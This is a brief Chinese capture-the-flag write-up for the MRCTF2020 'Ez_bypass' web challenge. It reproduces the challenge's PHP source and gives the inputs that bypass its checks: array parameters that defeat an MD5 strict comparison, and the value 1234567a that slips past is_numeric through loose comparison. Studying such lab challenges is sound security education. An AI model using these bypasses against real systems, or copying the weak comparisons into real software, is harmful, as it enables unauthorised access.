[MRCTF2020]Ez_bypass 1

[MRCTF2020]Ez_bypass 1

https://buuoj.cn/

解题点：
1.MD5强碰撞
2.is_numerice() 绕过

代码审计：

if(isset($_GET['gg'])&&isset($_GET['id'])) 
{ 
    $id=$_GET['id']; 
    $gg=$_GET['gg']; 
    if (md5($id) === md5($gg) && $id !== $gg) 
    { echo 'You got the first step'; 
        if(isset($_POST['passwd'])) 
        { $passwd=$_POST['passwd']; 
            if (!is_numeric($passwd)) 
            { if($passwd==1234567) 
                { echo 'Good Job!'; 
                    highlight_file('flag.php'); 
                    die('By Retr_0'); } 
                else { echo "can you think twice??"; } 
            } else{ echo 'You can not get it !'; } 
        } else{ die('only one way to get the flag'); } 
    } else { echo "You are not a real hacker!"; } 
} else{ die('Please input first'); } }

MD5碰撞用数组绕过：

?gg[]=111&id[]=222

passwd经过!is_numerice()不能为数字，且要弱等于1234567，即：

passwd=1234567a

参考：
https://www.cnblogs.com/xhds/p/12312223.html
https://www.cnblogs.com/Zhu013/p/11465859.html

标签：GET,passwd,echo,gg,bypass,Ez,else,id,MRCTF2020
来源： https://blog.csdn.net/m0_46684679/article/details/120868693